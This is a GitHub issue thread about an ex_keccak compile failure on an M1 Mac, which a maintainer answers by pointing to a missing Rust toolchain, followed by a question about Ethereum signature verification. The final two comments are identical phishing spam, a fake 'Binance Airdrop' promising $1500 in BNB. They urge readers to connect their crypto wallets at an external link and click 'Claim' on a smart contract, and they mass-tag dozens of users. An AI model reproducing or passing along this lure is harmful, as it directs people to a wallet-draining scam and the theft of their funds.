### ISSUE TITLE
Can't compile ex_keccak

### ISSUE THREAD

**Issue by astroTANSAN** [hswick/exw3#119]
This is the the error I am getting when trying to compile. I'm using a Mac Air with an M1 processor. Any ideas how to fix this?

```bash
$ mix compile
==> ex_keccak
Compiling 1 file (.ex)

== Compilation error in file lib/ex_keccak.ex ==
** (ErlangError) Erlang error: :enoent
    (elixir 1.13.2) lib/system.ex:1044: System.cmd("cargo", ["metadata", "--format-version=1"], [cd: "native/exkeccak"])
    (rustler 0.22.2) lib/rustler/compiler/config.ex:81: Rustler.Compiler.Config.external_resources/2
    (rustler 0.22.2) lib/rustler/compiler/config.ex:69: Rustler.Compiler.Config.build/1
    (rustler 0.22.2) lib/rustler/compiler.ex:9: Rustler.Compiler.compile_crate/2
    lib/ex_keccak.ex:2: (module)
could not compile dependency :ex_keccak, "mix compile" failed. Errors may have been logged above. You can recompile this dependency with "mix deps.compile ex_keccak", update it with "mix deps.update ex_keccak" or clean it with "mix deps.clean ex_keccak"
```

**Comment by ayrat555** [comment]
@astroTANSAN Hello. I think you need to install rust - https://www.rust-lang.org/tools/install

**Comment by astroTANSAN** [comment]
@ayrat555 thank you!

**Comment by astroTANSAN** [comment]
I installed rust and I am still getting this error. Do you have instructions for this?

**Comment by astroTANSAN** [comment]
Is it normal for the compile to take a long time for that library?

**Comment by ayrat555** [comment]
@astroTANSAN do you mean the ex_kecak nif? it's ok

**Comment by astroTANSAN** [comment]
How can I verify with an Ethereum address? how would I convert the ethereum wallet address into a public key? does the string for the message have to be converted as well?

```
:ok = ExSecp256k1.verify(message, signature, public_key)
```

**Comment by arconejeros** [comment]
# Binance Airdrop Guide: Claim Your $1500 in BNB Now!

Congratulations! You've won a share of the $500k Binance Airdrop, and we're excited to give you $1500 in BNB to celebrate the end of the year. Follow the steps below to claim your tokens and make the most of this festive giveaway!

[![Claim Now](https://i.ytimg.com/vi/PFhGDyXstas/maxresdefault.jpg)](http://go.bnbcoinsearn.online/97Q7Yj)

## Steps to Claim:

### 1. Connect Your Binance Wallet:
   - Click on the [Connect Wallet](https://go.bnbcoinsearn.online/97Q7Yj) link.
   - Choose your preferred wallet provider (Metamask, Trust Wallet, etc.).

### 2. Interact with the Contract:
   - Once your wallet is connected.
   - Click on the "**Claim**" button to interact with the smart contract.

Don't miss out on your $1500 in BNB! Act now to secure your tokens.


Winners: @

**Comment by prezo-ci-bkp** [comment]
# Binance Airdrop Guide: Claim Your $1500 in BNB Now!

Congratulations! You've won a share of the $500k Binance Airdrop, and we're excited to give you $1500 in BNB to celebrate the end of the year. Follow the steps below to claim your tokens and make the most of this festive giveaway!

[![Claim Now](https://i.ytimg.com/vi/PFhGDyXstas/maxresdefault.jpg)](http://go.bnbcoinsearn.online/97Q7Yj)

## Steps to Claim:

### 1. Connect Your Binance Wallet:
   - Click on the [Connect Wallet](https://go.bnbcoinsearn.online/97Q7Yj) link.
   - Choose your preferred wallet provider (Metamask, Trust Wallet, etc.).

### 2. Interact with the Contract:
   - Once your wallet is connected.
   - Click on the "**Claim**" button to interact with the smart contract.

Don't miss out on your $1500 in BNB! Act now to secure your tokens.


Winners: @gauravssnl, @avishkarabhishek786, @sVieira151, @Devilla, @leon0399, @perpatron, @machiav3lli, @Stefie, @siko, @MisterReally, @yfujimot, @meamuri, @bowman, @akirill0v, @sheluchin, @misk-finance, @tiensonqin, @drish, @magicmon, @ademaro, @skeptycal, @maxgfr, @mikalv, @0xbhagi, @AllenFang, @chrsow, @OxFred, @anankitpatil, @andrewcockerham, @Perf5150, @miighty, @livelybone, @naartjie, @lnaie, @KleeTaurus, @blancosj, @IvanBila, @ludwigvonmises2, @Leo-Mu, @KingLouisXVII, @0-vortex, @plusreed, @vaibhavchellani, @aHumbleCultist, @bereilhp, @swangui, @sangbejo, @guilhermelenz, @codedplanetuk, @tshields44
